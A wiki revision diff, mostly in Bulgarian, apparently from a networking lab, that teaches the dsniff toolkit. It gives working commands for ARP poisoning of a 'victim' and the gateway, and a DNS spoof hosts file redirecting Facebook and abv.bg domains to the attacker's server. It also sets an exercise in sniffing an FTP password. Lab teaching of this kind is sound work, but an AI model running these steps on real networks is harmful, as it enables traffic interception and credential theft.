Difference between revisions of "Spoofing"

From Ilianko
Line 50: Line 50:
  
 
== dnsspoof ==
 
== dnsspoof ==
 +
1. Създайте веб сървър.
  
1. Създаване на файл с хостовете, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
+
 
 +
2. Конфигурирайте с домайните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
  
 
Създаване на файл.  
 
Създаване на файл.  
Line 60: Line 62:
 
  172.16.16.165 *.abv.bg
 
  172.16.16.165 *.abv.bg
  
2. Стартиране на програмата, като администратор
+
2. Стартирайте на програмата като администратор
  
 
  ~$dnsspoof -f host.new
 
  ~$dnsspoof -f host.new

Revision as of 13:33, 6 October 2012

dsniff

dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"

Включени инструменти:

  • arpspoof - Send out unrequested (and possibly forged) arp replies.
  • dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
  • dsniff - password sniffer for several protocols.

filesnarf - saves selected files sniffed from NFS traffic.

macof - flood the local network with random MAC addresses.

mailsnarf - sniffs mail on the LAN and stores it in mbox format.

msgsnarf - record selected messages from different Instant Messengers.

sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.

sshow - SSH traffic analyser.

tcpkill - kills specified in-progress TCP connections.

tcpnice - slow down specified TCP connections via "active" traffic shaping.

urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.

webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.

webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

Инсталация в Убунту:

~$ sudo apt-get install dsniff

arpspoof

Пренасочване на трафика през вашата машина:

victim - машината, която ще се подслушва gateway - gateway на мрежата

стартиране на

$arpspoof -t victim gateway
$arpspoof -t gateway victim

Включване на IP forwarding, иначе жертвата ще загуби свързаност

$echo 1 > /proc/sys/net/ipv4/ip_forward

Стартирайте wireshark и проверете дали атаката има успех

dnsspoof

1. Създайте веб сървър.


2. Конфигурирайте с домайните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.

Създаване на файл.

~$nano host.new 

Примерно съдържание.

172.16.16.165 *.facebook.com
172.16.16.165 *.abv.bg

2. Стартирайте на програмата като администратор

~$dnsspoof -f host.new


След стартиране програмата слуша за dns запитвания.

dsniff

Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата

mailsnarf